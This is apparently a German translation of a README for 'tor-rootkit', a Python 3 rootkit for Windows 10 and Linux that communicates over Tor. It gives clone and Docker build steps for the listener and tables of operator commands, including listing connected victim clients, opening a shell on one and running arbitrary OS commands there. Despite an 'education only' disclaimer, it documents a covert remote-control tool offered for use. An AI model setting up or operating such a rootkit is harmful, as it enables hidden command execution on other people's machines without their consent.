
Ein eigenständiger Windows 10 / Linux Rootkit in Python 3 unter Verwendung von Tor.
Ein Python 3 Standalone-Rootkit für Windows 10 und Linux. Die Netzwerkkommunikation wird über das Tor-Netzwerk hergestellt.
Dieses Rootkit ist in Arbeit (WIP).
Nur für Bildungszwecke verwenden.
git clone https://github.com/emcruise/tor-rootkit.git
cd ./tor-rootkit
docker build -t listener .
docker run -v $(pwd)/executables:/executables/ -it listener
tor-rootkit/
│ ...
└ executables/
Hinweis: Der Client kann eine Weile brauchen, um eine Verbindung herzustellen, da PyInstaller-Executables etwas langsamer sind und es Tor starten muss.
| Befehl | Erklärung |
|---|---|
help | Zeigt das Hilfemenü an |
^C oder exit | Beendet die Shell |
list | Listet alle verbundenen Clients mit ihrem jeweiligen Index auf |
select <index> | Startet eine Shell mit dem Client |
| Befehl | Erklärung |
|---|---|
help | Zeigt das Hilfemenü an |
^C oder exit | Beendet die Client-Shell und kehrt zur Listener-Shell zurück |
os <command> | Führt einen Befehl in der Client-Shell aus und gibt die Ausgabe zurück |
background | Hält die Verbindung zu einem Client aufrecht und kehrt zum Listener zurück |
Jegliche Beiträge sind willkommen. Erstelle einen Pull-Request und ich werde ihn mergen, wenn er meine automatischen Tests besteht.